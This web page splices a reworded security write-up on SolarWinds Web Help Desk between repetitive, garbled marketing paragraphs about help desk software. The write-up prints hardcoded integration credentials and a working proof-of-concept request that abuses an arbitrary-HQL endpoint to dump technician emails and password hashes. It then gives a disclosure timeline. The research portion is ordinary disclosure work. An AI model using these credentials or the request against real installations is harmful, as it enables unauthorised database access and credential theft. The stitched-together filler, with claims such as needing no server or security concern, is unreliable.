Eahlzq6

Benefits Of Web Help Desk Software

Benefits of Web Help Desk Software

A Web Help Desk is a powerful software solution for managing and automating remote assistance tickets. It allows users to create FAQs and Knowledge Base articles, and promotes end-user self-service. With the built-in reporting and dashboards, it provides essential insights and metrics for your company. In addition, this application reduces overhead costs by facilitating employee self-service through knowledge base articles and FAQs. It also automates escalation processes, enables mobile notifications, and enables self-service through knowledge base articles and FAQ sections.

In addition to the various features of the program, a web help desk is also connected to a panel. With this feature, the user can configure their accounts at a web browser level. Since the software is accessible from anywhere, it doesn’t require a server or any IT expertise. It is also accessible anytime, anywhere. With a web-based system, it’s easy to use and adapts to the needs of growing businesses.

Web help desk software

A Web Help Desk can discover assets and associate them with end-users, as well as help desk tickets, thus providing a complete audit trail. This audit trail can help identify costly repairs and inform asset replacement decisions. A Web Help Desk can be configured to take full control of incident management. It can also automatically convert emails into tickets, route them to staff groups, and enable automatic escalation based on business requirements. It also features a comprehensive audit trail of help desk tickets.

A web help desk can be connected to a panel, which makes it easier to manage. The configuration of this program is performed at the web browser level, which means it is easy to use, no matter how many people access it. Moreover, it doesn’t require any IT expertise, which makes it the perfect solution for businesses with a wide variety of customer support needs. There are even cloud-based versions of this software that adapt to changing requirements.

What is the Solarwinds Web Help Desk and how can it help you?

Marketing materials by Solarwinds:

Solarwinds Web Help Desk allows you to manage all end-user troubles tickets and track the service request lifecycle from ticket creation through resolution from one central help desk management web interface.

Web Help Desk makes it easy to submit help desk tickets, manage IT assets and provide end-user support.

The Attack Surface Map

WebObjects

We discovered that Web Help Desk also used a framework called WebObjects when we tried the web application. The following was an example HTTP request for the HTMLObjects component.

/helpdesk/WebObjects/Helpdesk.woa/ra/configuration/database/test.json 

The routing was not clear to us. The file didn’t provide any information about the HTTP request that we saw when we used the web application. Analyzing the file revealed that there was also a Spring application.

We were unable to find any information in the file about how this route was declared and mapped so we did some very basic searches through the codebase to determine where it was being mapped.

Our experience shows that routes don’t always correspond to the request. Other methods may be used to infer details like the extension or.json. This is a common convention you might have encountered when auditing Ruby on Rails apps.

To locate the routing of the application, we created a simple but effective regex: database. *test. The following match was returned by this query:

/whd/helpdesk/WEB-INF/lib/com/macsdesign/whd/ui/Application.java: 494 /* */ 495 /* */ 496: /* 496 */ routeRequestHandler.addRoute(new ERXRoute("HelpdeskInitializer", "/configuration/database/test", ERXRoute.Method.Put, WhdInitializationController.class, "testDatabaseSettings")); 497 /* */ 498 /* */ 

Perfect. This is how the HTMLObjects routes look. We found the Application.java file containing the routes for the HTMLObjects components of this application.

Spring

As we mentioned, the file suggested that there was also a Spring application running in Web Help Desk. As we are familiar with Spring, it was easier to identify the attack surface for this part of the application.

It is a good idea to search the @RequestMapping code base in order to identify all Spring routes. This returned a lot of controllers with routes mapped through Spring Framework.

Discovery Process

We’ve already mapped the routes and have a good idea of what is accessible and exposed in the web application. However, we decided to look through the remaining files in the code base in order to find any obvious omissions.

We went through all JSP files in Web Help Desk. We found the following JavaScript file.

/whd/helpdesk/WEB-INF/jsp/test/orionIntegrationTest.jsp:

function callAddNoteToOrionAlert(frm)  startAPIcall(); try  ... omitted for brevity ... var auth = loginName:'helpdeskIntegrationUser', password:'dev-C4F8025E7'; RestInvokeAuth("/integration/orionAlertSource/"+id+"/alert/addNote", "POST", data, auth);  catch (err)  failedAPIcall(err);   

We noticed that these credentials had been hardcoded in a client side API call. So we searched the codebase for to see what access they would allow us.

We found more credentials declared at /whd/helpdesk/WEB-INF/lib/com/solarwinds/whd/common/ConstantsAndSettings.java:

package com.solarwinds.whd.common; public abstract class ConstantsAndSettings  public static final String DEVELOPMENT_SPRING_PROFILE = "development"; public static final boolean HELPDESKINTEGRATION_ENABLE_DEV_ANYADDRESS = true; public static final boolean HELPDESKINTEGRATION_ENABLE_DEV_LOGIN = true; public static final String HELPDESKINTEGRATION_REALM_NAME = "Helpdesk integration"; public static final String HELPDESKINTEGRATION_PRODUCTION_LOGINNAME = "helpdesk91114AD77B4CDCD9E18771057190C08B"; public static final String HELPDESKINTEGRATION_PRODUCTION_PASSWORD = "1A11E431853F4CC99C27BF729479EB5D"; public static final String HELPDESKINTEGRATION_DEVELOPMENT_LOGINNAME = "helpdeskIntegrationUser"; public static final String HELPDESKINTEGRATION_DEVELOPMENT_PASSWORD = "dev-C4F8025E7"; public static final long SSOAUTH_RECHECK_INTERVAL = 15000L; public static final String PRIVILEGED_NETWORKS_PROPERTY = "WHDPrivilegedNetworks";  

We discovered that the application contained two sets of hardcoded credentials after reading the above. One for , and one for production . This was crucial because only the production credentials were used in our final exploit.

We now have the hardcoded credentials. We searched the codebase to see if any authentication logic was being used that relied upon these credentials.

These credentials were accepted at multiple places in the source code:

  • /whd/helpdesk/WEB-INF/lib/com/macsdesign/whd/rest/controllers/BasicAuthRouteController.java – Accepts both development and production credentials
  • /whd/helpdesk/WEB-INF/lib/com/solarwinds/whd/service/impl/auth/HelpdeskIntegrationAuthenticationManager.java – Accepts both development and production credentials
  • /whd/helpdesk/WEB-INF/lib/com/solarwinds/whd/service/impl/auth/ClusterNodeAuthenticationManager.java – Only accepts production credentials

In order to determine which authentication managers were in use, we were able to refer to whd/helpdesk/WEB-INF/lib/whd-security.xml which declared this information like so:

... omitted to save space...

We have an understanding of the attack surface as well as the authentication requirements for the different routes within the application. It was time to dig into the logic of helpdeskIntegrationAuthenticationManager as we were interested in an endpoint located in the /assetReport/ path.

The source code for HelpdeskIntegrationAuthenticationManager.java can be found below:

/* 52 */ WebAuthenticationDetails details = (WebAuthenticationDetails)token.getDetails(); /* */ /* 54 */ boolean isDevelopment = this.environment.acceptsProfiles(new String[]  "development" ); /* 55 */ boolean validCredentials = false; /* 56 */ if ("helpdesk91114AD77B4CDCD9E18771057190C08B".equals(loginName) && "1A11E431853F4CC99C27BF729479EB5D" /* 57 */ .equals(password))  /* */ /* 59 */ validCredentials = true; /* */  /* 61 */ else if (isDevelopment && "helpdeskIntegrationUser" /* 62 */ .equals(loginName) && "dev-C4F8025E7" /* 63 */ .equals(password))  /* */ /* 65 */ validCredentials = true; /* */  /* 67 */ boolean isAllowedAddress = InternalCommunicationUtils.isAllowedAddress(details.getRemoteAddress(), isDevelopment); /* 68 */ if (isAllowedAddress)  /* 69 */ if (validCredentials)  /* */ /* 71 */ SimpleGrantedAuthority simpleGrantedAuthority = new SimpleGrantedAuthority("ROLE_INTEGRATION"); /* */ /* */ /* 74 */ UsernamePasswordAuthenticationToken result = new UsernamePasswordAuthenticationToken(null, password, Arrays.asList(new GrantedAuthority[]  (GrantedAuthority)simpleGrantedAuthority )); /* */ /* 76 */ result.setDetails(token.getDetails()); /* 77 */ return (Authentication)result; /* */  /* */ /* */ /* 81 */ throw new BadCredentialsException(this.messages /* 82 */ .getMessage("AbstractUserDetailsAuthenticationProvider.badCredentials")); /* */  

Let’s get down to it.

  • token.getDetails(); – this sets this.remoteAddress as request.getRemoteAddr();
  • Boolean isDevelopment This evaluates to false by default
  • else if (isDevelopment && "helpdeskIntegrationUser" – this block of code won’t run
  • InternalCommunicationUtils.isAllowedAddress – checks if request.getRemoteAddr(); is a loopback address
  • new SimpleGrantedAuthority("ROLE_INTEGRATION"); – if all conditions pass, we get ROLE_INTEGRATION authorization

You may be thinking that we wont be able to take this exploit further due to InternalCommunicationUtils.isAllowedAddress checking if our request comes from a loopback address.

Here is the fun part. Solarwinds Web Help Desk deployed via reverse proxy on the same host does not provide protection. In this scenario, isAllowedAddress will evaluate to true as request.getRemoteAddr() will return a loopback IP address, allowing for further exploitation.

Later, we confirmed our suspicions when we discovered numerous vulnerabilities that could be exploited in the wild. This mitigation, in our opinion, is a temporary fix for a larger architectural problem that ignores security principles when designing authentication.

We now have some authentication to Solarwinds Web Help Desk via the hardcoded credentials. What is the worst that we can do?

We found the following code after analysing Spring controllers now accessible via our hardcoded credentials:

/* */ @RequestMapping(value = "/rawHQL", method = RequestMethod.POST) /* */ @ResponseBody /* */ @ResponseStatus(HttpStatus.OK) /* */ public String getStringResult(@RequestBody String selectHQL) throws Exception  /* 36 */ logger.debug("Received request for result of this hql=", selectHQL); /* 37 */ return this.assetReportService.getStringHQLResult(selectHQL); /* */  

Tracing the code for this.assetReportService.getStringHQLResultwe found the following sink:

/* */ public String getStringHQLResult(String hql)  /* 61 */ String result = ""; /* 62 */ Query query = this.entityManager.createQuery(hql); /* 63 */ List items = query.getResultList(); /* */ /* */ /* 66 */ result = result + result; /* 67 */ return result; /* */  

It was somewhat surreal to find the controller. It was amazing to discover an endpoint that could execute any arbitrary HQL. The controller will help you evaluate any HQL query that we give it.

We could create HQL queries on these tables as long as our codebase contained Hibernate Java Classes for the databases we wanted to interact with.

It seems so simple, let’s see if we can make it work.

True story: We spent more than an hour trying to fix this endpoint in Burp Suite that was unable execute queries despite having the correct HQL syntax. We were so confused.

This is a simple POST request. What could be more difficult than exploiting this issue. This is what we saw:

"reason":"org.hibernate.hql.internal.ast.QuerySyntaxException: unexpected token: Cpassword near line 1, column 15 [select+email%2Cpassword+from+Tech=]" 

URL encoding was the transformation of a query to something that would cause a query syntax exception to Hibernate.

We were willing to spend an hour trying to debug this but another colleague suggested that we send the request with Content Type: plain.

Finally, it worked.

PoC

In order to exploit this bug, request.getRemoteAddr() must evaluate to a loopback address. This happens when the reverse proxy is running on the same host.

Below is a proof-of-concept of this vulnerability

POST /helpdesk/assetReport/rawHQL HTTP/1.1 Host: re.local:8081 Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-Version: 1.7 DNT: 1 X-XSRF-TOKEN: 712c84a6-b963-441a-9e2a-f16abdeafe39 X-Requested-With: XMLHttpRequest Authorization: Basic aGVscGRlc2s5MTExNEFENzdCNENEQ0Q5RTE4NzcxMDU3MTkwQzA4QjoxQTExRTQzMTg1M0Y0Q0M5OUMyN0JGNzI5NDc5RUI1RA== User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Referer: http://re.local:8081/helpdesk/WebObjects/Helpdesk.woa/wo/25.7.11.0.6.1.1.3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: whdticketstab=mine; XSRF-TOKEN=712c84a6-b963-441a-9e2a-f16abdeafe39; Connection: close Content-Type: text/plain Content-Length: 31 select email,password from Tech 

The following will be returned:

HTTP/1.1 200 X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 Content-Type: text/javascript;charset=ISO-8859-1 Content-Length: 64 Date: Thu, 21 Oct 2021 03:35:11 GMT Connection: close [email protected] SHAuCLxzS3PxoW0foPjmAKJ_V2OP_OoLe8k19HWi7Jy6zI 

Vendor Response

These issues were dealt with seriously by Solarwinds. We appreciate their cooperation in resolving this issue and in corresponding with us.

This issue was reported to Solarwinds on October 23, 2021.

Below is the timeline for this disclosure process:

  • October 23rd, 2021 – Disclosure of hardcoded credentials to Solarwinds PSIRT and HSQL vulnerability
  • November 8th, 2021 – Response from Solarwinds confirms receipt of vulnerability
  • November 25th, 2021 – Response from Solarwinds confirms patch release date
  • December 23rd, 2021 – Response from Solarwinds confirms release of Web Help Desk 12.7.7 hotfix 1

Solarwind’s advisory provides satisfactory details that will help ensure that the vulnerability is not exploited. Here is the knowledge base article that details the workarounds or patches to be applied.

Conclusion

Solarwinds Web Help Desk contained hardcoded credentials. These credentials allowed access to sensitive controllers capable of running arbitrary HQL queries. An attacker could use this vulnerability to modify, update, delete or insert nearly any information in the database.

Assetnote’s Security Research Team is constantly looking for security flaws in enterprise software as part of our Continuous Security Platform development. This helps customers to identify security problems across their attack surface.

This research shows that organizations that use enterprise software often have poor visibility or misunderstand the risks. Organizations tend to focus too much on network and in-house issues, at the expense or visibility and awareness of third-party software. We have seen that many vulnerabilities remain in enterprise software, which is not always obvious.

This vulnerability was first discovered by customers of our Attack Surface Management platform. Contact us if you’re interested in having a complete, real-time view of your attack surface.

Assetnote is Hiring!

For current opportunities, please visit our careers page. Even if you don’t see any open positions in your field, we are always looking for the best talent.

An important benefit of a Web Help Desk is that it is easy to use and is customizable. Users can access information and configure settings at the web browser level, and can even manage customer tickets and IT assets. These systems are great for businesses that require a flexible and user-friendly system. These programs are also highly secure and can be used to streamline help desk ticket management processes. You can choose to purchase one that includes additional tools to manage customer service requests.

A Web Help Desk allows you to keep track of your assets. By automatically discovering and assigning computer hardware and software assets to specific users, you can easily manage your IT assets and ensure they are in good condition. Your employees will appreciate the automated inventory alerts, which will streamline your IT inventory planning and minimize costs. Using this software for your IT asset management tasks will save you time. The web help desk will also automate your inventory and help you manage it more effectively.

A Web Help Desk connects with a panel, allowing you to configure it from anywhere. The configuration is available at the web browser level, and all you need is an Internet connection. The software is connected to a panel, so you do not need to worry about security. The best part is that it is completely customizable, allowing your staff to customize it to suit their needs. It also gives you the flexibility to set different settings for different departments.

A web help desk connects to a panel for easy monitoring and management. Its web browser is the main interface, which allows users to configure the system to their liking. Most of the software will also work with your existing IT department, so you can focus on improving the customer experience. However, there are some limitations to using a cloud-based software. A cloud-based application allows for customization and is available at all times. The system is accessible from any computer, which is a great feature if you have a limited amount of staff.

A web help desk can be connected to a panel. Depending on your needs, a web help desk can be connected to an email system. The main benefit is that you can automate the entire customer support process through the use of a website. This helps your employees to be more efficient and productive. You can automate the process and track assets, ensuring that it is easy to solve problems and improve the quality of service.

Related Posts

Leave a Reply

Your email address will not be published.